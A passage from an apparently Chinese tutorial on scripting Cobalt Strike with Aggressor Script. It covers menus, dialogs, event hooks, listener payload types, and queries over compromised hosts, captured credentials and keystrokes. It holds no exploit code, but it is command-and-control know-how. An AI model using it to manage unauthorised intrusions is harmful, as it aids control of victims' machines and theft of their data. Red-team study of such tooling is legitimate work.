</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213152019734.png" alt="image-20201213152019734"></p> <p>这里说明，我们可以直接写函数，也可以调用</p> <p><code>$1</code> 是我们接受到的第一个参数，以此类推：<code>$2</code>是第二个参数......</p></li></ul> <h2 id="彩色输出">彩色输出 <a href="#彩色输出" class="header-anchor">#</a></h2> <p>简单的来说就是让我们的控制台输出一个带颜色的字体：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>0This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>1This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 这是黑色</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>2This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>3This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>4This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>5This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>6This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>7This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>8This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>9This is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>AThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>BThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>CThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>DThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>EThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>FThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213145856195.png" alt="image-20201213145856195"></p> <h1 id="cobalt-strike">Cobalt Strike <a href="#cobalt-strike" class="header-anchor">#</a></h1> <h2 id="c2客户端">C2客户端 <a href="#c2客户端" class="header-anchor">#</a></h2> <p>在3.0版本以上，客户端界面的大部分东西都是使用 deafult.cna 构建出来的，菜单、默认按钮，包括我们日常上线的时候 Event log 的格式化输出。接下来我们就一一介绍</p> <h3 id="键盘快捷键">键盘快捷键 <a href="#键盘快捷键" class="header-anchor">#</a></h3> <p>语法：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">bind</span> <span class="token operator">&lt;</span>想绑定的组合键<span class="token operator">&gt;</span>
	<span class="token punctuation">{</span>
		按下快捷键执行的命名<span class="token punctuation">;</span>	
	<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>我们绑定一个来试试看：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">bind</span> Ctrl+H <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;使用键盘快捷键哦！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 弹窗显示我们的消息</span>
	elog<span class="token punctuation">(</span><span class="token string">&quot;使用了快捷键！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 在 Event Log位置显示信息</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213153451637.png" alt="image-20201213153451637"></p> <p>当我们 按下 Ctrl + H 的组合键的时候，我们就直接弹出信息，并且按照代码一样在 Event log下输出，组合键可以随便写，你也可以=只写一个 H，都是可以的，加上 Ctrl只是约定俗，也可以使用对个修饰符，比如 Ctrl + Shift + H。</p> <h3 id="菜单编写">菜单编写 <a href="#菜单编写" class="header-anchor">#</a></h3> <p>菜单就是下面这样的东西：</p> <p><img src="/images/Aggressor-Script/image-20201213154112698.png" alt="image-20201213154112698"></p> <p>我们可以自己定义想要的菜单或者将我们的二级菜单添加到已经存在的主菜单下，创建自定义菜单语法如下：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token operator">&lt;</span>菜单函数名<span class="token operator">&gt;</span><span class="token punctuation">{</span>
	        item<span class="token punctuation">(</span><span class="token string">&quot;&amp;&lt;二级菜单显示&gt;&quot;</span>, <span class="token punctuation">{</span>点击时执行的代码，或者函数<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 第一个子菜单</span>
        	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">#分割线</span>
        	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;&lt;二级菜单名字&gt;&quot;</span>, <span class="token punctuation">{</span>点击时执行的代码，或者函数<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 第二个子菜单</span>
        	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">#分割线</span>
<span class="token punctuation">}</span>

menubar<span class="token punctuation">(</span><span class="token string">&quot;一级菜单显示名&quot;</span>, <span class="token string">&quot;菜单函数名&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>我们现在定义一个简单的菜单：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup my_help<span class="token punctuation">{</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;这是百度&quot;</span>,<span class="token punctuation">{</span>url_open<span class="token punctuation">(</span><span class="token string">&quot;http://www.baidu.com&quot;</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;这是谷歌&quot;</span>,<span class="token punctuation">{</span>url_open<span class="token punctuation">(</span><span class="token string">&quot;http://www.google.com&quot;</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># url_open()这个函数是用来打开网站的</span>
	
<span class="token punctuation">}</span>
menubar<span class="token punctuation">(</span><span class="token string">&quot;帮助菜单&quot;</span>, <span class="token string">&quot;my_help&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 菜单函数，一定要加上</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213155650731.png" alt="image-20201213155650731"></p> <p>当我们点击以后，会直接打开百度的链接：</p> <p><img src="/images/Aggressor-Script/1.gif" alt="1"></p> <p>如果我们并不想创建新的菜单，而是想在默认的菜单上增加，我们可以这样做：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>popup help{
	item(&quot;&amp;关于汉化&quot;,{show_message(&quot;4.1汉化 by XXX &quot;)});
	separator();
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213160405665.png" alt="image-20201213160405665"> <img src="/images/Aggressor-Script/image-20201213160534566.png" alt="image-20201213160534566"></p> <p>这样我们就在与原有的基础上加上了一个关于汉化的提示，这里我们是加载外部的 cna ，你可以修改默认的 default.cna来添加自己的信息。</p> <ul><li><p>右键菜单的选择</p> <p>除了上面说的那样的菜单，我们还会在点击右键的时候打开菜单，如下所示：
<img src="/images/Aggressor-Script/image-20201214094754154.png" alt="image-20201214094754154"></p> <p>创建这样的菜单我们的语法为：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup beacon_bottom<span class="token punctuation">{</span>
    	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;关于作者&quot;</span>, <span class="token punctuation">{</span> url_open<span class="token punctuation">(</span><span class="token string">&quot;https://wgpsec.org&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        	<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201214095427815.png" alt="image-20201214095427815"></p> <p>我们在任何的菜单里面都可以嵌套菜单，就整出一个多级菜单的样子，我们把上面的代码进行修改</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup beacon_bottom<span class="token punctuation">{</span>
	menu <span class="token string">&quot;关于作者&quot;</span><span class="token punctuation">{</span>
    	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;博客&quot;</span>, <span class="token punctuation">{</span> url_open<span class="token punctuation">(</span><span class="token string">&quot;https://wgpsec.org&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		item<span class="token punctuation">(</span><span class="token string">&quot;&amp;QQ&quot;</span>, <span class="token punctuation">{</span> show_message<span class="token punctuation">(</span><span class="token string">&quot;1574991635&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        	<span class="token punctuation">}</span>
		<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201214100107462.png" alt="image-20201214100107462"></p> <p>多级菜单就是多了一个<code>menu &quot;右键显示的信息&quot;{}</code> 的写法，这里和上面菜单编写最大的区别就是没有<code>menubar</code>的写法，因为我们是直接在右键菜单上进行修改的，也就是原有菜单上修改</p></li></ul> <h3 id="输入框的编写">输入框的编写 <a href="#输入框的编写" class="header-anchor">#</a></h3> <p>在一些时候，我们想整一个输入框。让用户输入一些东西的时候，可以使用 dialog 数据模型进行编写，他需要接受三个参数</p> <p><code>$1</code> 对话框的名称</p> <p><code>$2</code> 对话框里面的内容，可以写多个</p> <p><code>$3</code> 回调函数，当用户 使用 dbutton_action 调用的函数</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token builtin class-name">test</span> <span class="token punctuation">{</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;收集信息&quot;</span>,<span class="token punctuation">{</span>dialog_test<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 建立一个菜单栏目，点击收集信息时就调用show函数</span>
<span class="token punctuation">}</span>

menubar<span class="token punctuation">(</span><span class="token string">&quot;测试菜单&quot;</span>,<span class="token string">&quot;test&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 注册菜单</span>

sub show <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;dialog的引用是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$1</span><span class="token builtin class-name">.</span><span class="token string">&quot;<span class="token entity" title="\n">\n</span>按钮名称是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	println<span class="token punctuation">(</span><span class="token string">&quot;用户名是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$3</span><span class="token punctuation">[</span><span class="token string">&quot;user&quot;</span><span class="token punctuation">]</span>.<span class="token string">&quot;<span class="token entity" title="\n">\n</span>密码是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$3</span><span class="token punctuation">[</span><span class="token string">&quot;password&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment"># 这里show函数接收到了dialog传递过来的参数，分</span>

<span class="token punctuation">}</span>
sub dialog_test <span class="token punctuation">{</span>
	<span class="token variable">$info</span> <span class="token operator">=</span> dialog<span class="token punctuation">(</span><span class="token string">&quot;这是对话框的标题&quot;</span>,%<span class="token punctuation">(</span>username <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;root&quot;</span>,password <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;&quot;</span><span class="token punctuation">)</span>,<span class="token operator">&amp;</span>show<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">#第一个是菜单的名字，第二个是我们下面定义的菜单显示内容的默认值，第三个参数是我们回调函数，触发show函数的时候显示，并将我们的输入值传递给他</span>
	drow_text<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;user&quot;</span>,<span class="token string">&quot;输入用户名：&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 设置一个用户名输入条</span>
	drow_text<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;password&quot;</span>,<span class="token string">&quot;输入密码&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
	dbutton_action<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;马上起飞！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 点击按钮，触发回调函数</span>
	dbutton_help<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;http://www.wgpsec&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 显示帮助信息</span>
	dialog_show<span class="token punctuation">(</span><span class="token variable">$info</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># 显示文本输入框</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>定义 diolog 的时候，会将用户输入的东西传递给第三个参数设置的函数，dialog传递的时候一共会传递三个参数给函数</p> <p><code>$1</code>  为 dialog的引用</p> <p><code>$2</code> 按钮的名称</p> <p><code>$3</code>对话框输入的值</p> <p><img src="/images/Aggressor-Script/image-20201217142103846.png" alt="image-20201217142103846"></p> <p><img src="/images/Aggressor-Script/image-20201217142130910.png" alt="image-20201217142130910"></p> <p>drow_text是指文对话框的输入，语法如下：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>drow_text<span class="token punctuation">(</span><span class="token string">&quot;变量名&quot;</span>,<span class="token string">&quot;提示语句&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>dbutton_action  将操作按钮添加到dialog 中，当点击这个按钮以后，会关闭对话框，并且传输数据到回调函数中</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>dbutton_action<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;按钮的名字&quot;</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>dbutton_help 将help按钮添加到对话框中，点击help跳转网页去</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>dbutton_help<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;https://www.wgpsec.org&quot;</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>dialog_show 显示对话框</p> <h3 id="事件处理">事件处理 <a href="#事件处理" class="header-anchor">#</a></h3> <p>Event Log 就是我们经常看到的那个东西，当有主机上线、用户登录或者离开等，都可以在上面显示出来：</p> <p><img src="/images/Aggressor-Script/image-20201213161603255.png" alt="image-20201213161603255"></p> <p>这是状态栏：</p> <p><img src="image-20201213163750009.png" alt="image-20201213163750009"></p> <p>这里我是用官方的例子来解释：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">set</span> EVENT_SBAR_LEFT <span class="token punctuation">{</span> <span class="token comment"># 设置 Event Log状态栏左边的信息</span>
	<span class="token builtin class-name">return</span> <span class="token string">&quot;[&quot;</span> <span class="token builtin class-name">.</span> tstamp<span class="token punctuation">(</span>ticks<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;] &quot;</span> <span class="token builtin class-name">.</span> mynick<span class="token punctuation">(</span><span class="token punctuation">)</span>.<span class="token string">&quot; 正在线上！！&quot;</span><span class="token punctuation">;</span> <span class="token comment">#显示的信息，tstamp(ticks())是显示时间。mynick()显示名字这里我在后面加上一个正在线上。</span>
<span class="token punctuation">}</span>

<span class="token builtin class-name">set</span> EVENT_SBAR_RIGHT <span class="token punctuation">{</span>
	<span class="token builtin class-name">return</span> <span class="token string">&quot;[lag: <span class="token variable">$1</span> $+ ]&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>当我修改以后再使用以后，我们发现我们的状态栏发生改变了</p> <p><img src="/images/Aggressor-Script/image-20201213162001867.png" alt="image-20201213162001867"></p> <p>我们再举一个例子，我们知道当有用户上线以后，会在Event log里面显示，但是这样我们可能看起来会不是很明显，我现在想要上线的时候，弹窗告诉我们谁谁谁链接了我们的C2服务器，并且修改Event Log显示的信息，那么我们就可以修改 event_join：</p> <blockquote><p>event_join：给定我们两个值：</p> <p><code>$1</code>-谁加入了团队服务器</p> <p><code>$2</code>-消息发布的时间</p></blockquote> <div class="language- line-numbers-mode"><pre class="language-text"><code>on event_join {
	show_message($1.&quot;加入到服务器中！&quot;);
	elog(mynick().&quot;来了！&quot;);
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213165900331.png" alt="image-20201213165900331"></p> <p>这样我们就很清楚那些人加入了我们的 C2 服务，当我们使用自己的 cna 时，默认的 cna 就不会加载，由于篇幅的限制，我在后续会把所有的支持的 事件 写出来，这里我们也能够懂得 Server 上线是使用的第一行代码，当机器上线的时候我们执行的代码：</p> <p><img src="/images/Aggressor-Script/image-20201213171747495.png" alt="image-20201213171747495"></p> <p>官方事件：https://www.cobaltstrike.com/aggressor-script/events.html</p> <h1 id="数据模型-data-model">数据模型（Data Model） <a href="#数据模型-data-model" class="header-anchor">#</a></h1> <blockquote><p>数据模型我感觉有点像自带的一些函数，我们输入这些函数得到数据</p></blockquote> <p>C2的服务端户把我们所有的数据保存在服务器上，例如主机信息、数据，下载的东西等，所以当我们加入C2的服务器时，我们可以直接将其他用户保存过的信息保存下来</p> <h2 id="数据接口-data-api-data-query">数据接口（Data Api）--data_query() <a href="#数据接口-data-api-data-query" class="header-anchor">#</a></h2> <blockquote><p>C2中所有的数据模型也会在后面翻译出来，我先简单的是用几个举例</p></blockquote> <table><thead><tr><th>Mode</th> <th>Function</th> <th>含义</th></tr></thead> <tbody><tr><td>targets</td> <td>存储的目标信息</td> <td>显示上线过的主机信息</td></tr> <tr><td>archives</td> <td>显示最近的信息</td> <td>显示最近的输出信息（慎用很卡）</td></tr> <tr><td>beacons</td> <td>显示所有的受感染的主机信息</td> <td>显示在线和上线过的主机</td></tr> <tr><td>credentials</td> <td>显示凭据信息</td> <td>我们抓取过的密码信息和制作的票据信息</td></tr> <tr><td>downloads</td> <td>显示下载信息</td> <td>显示我们在受控端下载的信息</td></tr> <tr><td>keystrokes</td> <td>记录键盘输入</td> <td>当我们选择进程记录键盘的时候，会将得到的键盘信息记录下来</td></tr> <tr><td>screenshots</td> <td>屏幕截图显示</td> <td>显示我们截图的二进制信息流</td></tr> <tr><td>sites</td> <td>托管的资产</td> <td>看起来是我们创建的监听的端口个Stager回连的端口</td></tr> <tr><td>servers</td> <td></td> <td></td></tr></tbody></table> <p>上面的这些数据结构（可以理解为函数）使用他们可以返回对应的信息，以数组的形式返回，我们可以通过 Aggressor Script的控制台进行查看，例如：</p> <p><img src="/images/Aggressor-Script/image-20201213191438105.png" alt="image-20201213191438105"></p> <p>支持下标索引：</p> <p><img src="/images/Aggressor-Script/image-20201213192346704.png" alt="image-20201213192346704"></p> <p>字典的操作也可以：</p> <p><img src="/images/Aggressor-Script/image-20201213192414888.png" alt="image-20201213192414888"></p> <p>我们可以写一个 cna 来获取当前主机的信息：</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code>command info<span class="token punctuation">{</span>
    <span class="token function">println</span><span class="token punctuation">(</span><span class="token string">&quot;IP地址：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;address&quot;</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token string">&quot;\n操作系统：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;os&quot;</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token string">&quot;\n用户名：&quot;</span><span class="token punctuation">.</span><span class="token function">targets</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span>$<span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">&quot;name&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>运行查看结果：</p> <p><img src="/images/Aggressor-Script/image-20201213193121595.png" alt="image-20201213193121595"></p> <p>我们输入的 0 和 1 就是取的对应的下标</p> <p>当然我们也是可以修改数据模型的输出的.</p> <h1 id="listeners">Listeners <a href="#listeners" class="header-anchor">#</a></h1> <blockquote><p>用来显示存在的监听器</p></blockquote> <p>监听器就是我们常常使用的，用来接收C2马子的流量的东西和写入荷载的信息；监听器会在生成荷载的时候将我们选择的某一个监听器的信息写入，在第二阶段时候，利用Stager加载我们的配置信息，如果是一个 Beacon_HTTP 的话，那么写入的东西包括 IP、端口、回连地址等信息，如下</p> <p><img src="/images/Aggressor-Script/image-20201213202406153.png" alt="image-20201213202406153"></p> <p>Listener API 会将所有的监听信息显示出来，我们可以使用 <code>Listeners()</code>显示所有的信息，如果我们有本地的监听，例如 SMB 的监听的话，我们就需要使用 <code>Listeners_local</code> 显示本地的信息，如下：</p> <p><img src="/images/Aggressor-Script/image-20201213210924614.png" alt="image-20201213210924614"></p> <p>这样我们可以显示我们的信息，但是我们没法详细的查看每一个Listener的详细信息，那么我们可以使用 Listener_info 函数来显示我们所有的信息</p> <ul><li><p>Listener_info 的使用方式：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_info<span class="token punctuation">(</span><span class="token string">&quot;想要查看的监听器信息&quot;</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213213825612.png" alt="image-20201213213825612"></p> <p>我们可以将两者结合起来显示所有的监听器的信息，我们把Listeners 得到的名称传到 listener_info:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> show_info <span class="token punctuation">{</span>
	foreach <span class="token variable">$name</span> <span class="token punctuation">(</span>listeners<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token punctuation">{</span>
		println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\n">\n</span>== <span class="token variable">$name</span> 的配置信息 == &quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		foreach <span class="token variable">$key</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$value</span> <span class="token punctuation">(</span>listener_info<span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">))</span> <span class="token punctuation">{</span>
			println<span class="token punctuation">(</span><span class="token string">&quot;$[10]key : <span class="token variable">$value</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201213220411582.png" alt="image-20201213220411582"></p> <p>上面的 cna 加载以后就能得到这样的信息</p></li> <li><p>Listener_create_ext 创建新的监听器</p> <p>在 GUI 界面中我们可以直接创建，其实那个 GUI 创建也是调用的 Listener_create_ext，进行创建，下面是他个我们定义好的参数：</p> <p><code>$1</code>-侦听器名称
<code>$2</code>-有效负载（例如，windows / beacon_http / reverse_http）
<code>$3</code>-带有键/值对的映射，这些键/值对指定了监听器的链接信息，host和port等</p> <p><code>$2</code>的可选项为：</p> <table><thead><tr><th>payload</th> <th>类型</th></tr></thead> <tbody><tr><td>windows/beacon_dns/reverse_dns_txt</td> <td>Beacon DNS</td></tr> <tr><td>windows/beacon_http/reverse_http</td> <td>Beacon HTTP</td></tr> <tr><td>windows/beacon_https/reverse_https</td> <td>Beacon HTTPS</td></tr> <tr><td>windows/beacon_bind_pipe</td> <td>Beacon SMB</td></tr> <tr><td>windows/beacon_bind_tcp</td> <td>Beacon TCP</td></tr> <tr><td>windows/beacon_extc2</td> <td>External C2</td></tr> <tr><td>windows/foreign/reverse_http</td> <td>Foreign HTTP</td></tr> <tr><td>windows/foreign/reverse_https</td> <td>Foreign HTTPS</td></tr></tbody></table> <p><code>$3</code>的可选项：</p> <table><thead><tr><th>Key</th> <th>DNS</th> <th>HTTP/S</th> <th>SMB</th> <th>TCP(Bind)</th></tr></thead> <tbody><tr><td>althost</td> <td></td> <td>HTTP Host Header</td> <td></td> <td></td></tr> <tr><td>bindto</td> <td>bind  port</td> <td>bind  port</td> <td></td> <td></td></tr> <tr><td>beacons</td> <td>C2 Hosts</td> <td>C2 Hosts</td> <td></td> <td></td></tr> <tr><td>host</td> <td>strging Host</td> <td>strging Host</td> <td></td> <td></td></tr> <tr><td>port</td> <td>C2 port</td> <td>C2 port</td> <td>pipe name</td> <td>port</td></tr> <tr><td>profile</td> <td></td> <td>profile variant</td> <td></td> <td></td></tr> <tr><td>proxy</td> <td></td> <td>proxy config</td> <td></td> <td></td></tr></tbody></table> <p>按照这样的方式，我们使用 cna 配置一个 Beacon HTTP 的监听：</p> <p>语法：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>listener_creat_text<span class="token punctuation">(</span><span class="token 